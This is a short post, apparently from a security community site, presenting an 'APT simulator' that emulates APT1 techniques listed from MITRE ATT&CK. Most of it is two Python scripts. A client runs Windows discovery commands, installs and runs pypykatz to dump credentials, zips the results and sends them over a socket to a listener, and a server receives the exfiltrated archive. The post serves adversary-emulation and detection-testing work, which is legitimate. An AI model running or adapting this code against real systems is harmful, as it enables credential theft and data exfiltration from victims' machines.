24.11.2022
8
Like
129
Views
Tested Windows 10
Information from Mitre ATT&CK regarding the APT1 group is as follows:
APT1 used the commands net localgroup,net user, and net group to find accounts on the system.
APT1 has used RAR to compress files before moving them outside of the victim network.
APT1 used a batch script to perform a series of discovery techniques and saves it to a text file.
APT1 has collected files from a local victim.
APT1 listed connected network shares.
APT1 has been known to use credential dumping using Mimikatz.
APT1 gathered a list of running processes on the system using tasklist /v.
APT1 used the ipconfig /all command to gather network configuration information.
APT1 used the net use command to get a listing on network connections.
APT1 used the commands net start and tasklist to get a listing of the services on the system.
git clone https://github.com/anil-yelken/APT-Simulator
First of all we start apt1_server.py in server machine. After we start apt1.py in victim machine.
apt1_server.py
import socket s = socket.socket() s.bind(("0.0.0.0", 80)) s.listen() client_socket, address = s.accept() print(f"[+] {address} is connected.") with open("received_file.zip", "wb") as f: while True: bytes_read = client_socket.recv(4096) if not bytes_read: break f.write(bytes_read) client_socket.close() s.close()
apt1_client.py
import subprocess
import os
import zipfile
import socket
try:
localgroup=subprocess.check_output("net localgroup",shell=True)
with open("localgroup.txt", 'wb') as file:
file.write(localgroup)
except:
pass
try:
user=subprocess.check_output("net user",shell=True)
with open("user.txt", 'wb') as file:
file.write(user)
except:
pass
try:
group=subprocess.check_output("net group",shell=True)
with open("group.txt", 'wb') as file:
file.write(group)
except:
pass
try:
tasklist=subprocess.check_output("tasklist /v",shell=True)
with open("tasklist.txt", 'wb') as file:
file.write(tasklist)
except:
pass
try:
netuse=subprocess.check_output("net use",shell=True)
with open("netuse.txt", 'wb') as file:
file.write(netuse)
except:
pass
try:
netstart=subprocess.check_output("net start",shell=True)
with open("netstart.txt", 'wb') as file:
file.write(netstart)
except:
pass
try:
ipconfig=subprocess.check_output("ipconfig /all",shell=True)
with open("ipconfig.txt", 'wb') as file:
file.write(ipconfig)
except:
pass
try:
os.system("pip3 install pypykatz")
except:
pass
try:
os.system("pypykatz.py rekall dump -t 0")
print("pypykatz is finished.")
except:
pass
try:
file_zip = zipfile.ZipFile('file.zip', 'w')
for folder, subfolders, files in os.walk('.'):
for file in files:
if file.endswith('.txt'):
file_zip.write(os.path.join(folder, file),
os.path.relpath(os.path.join(folder, file), '.'),
compress_type=zipfile.ZIP_DEFLATED)
file_zip.close()
print("Files are compressed.")
s = socket.socket()
s.connect(("127.0.0.1", 80))
with open("file.zip", "rb") as f:
while True:
bytes_read = f.read(4096)
if not bytes_read:
break
s.sendall(bytes_read)
s.close()
print("Zip file sent.")
except:
pass
You need to log in to be able to comment!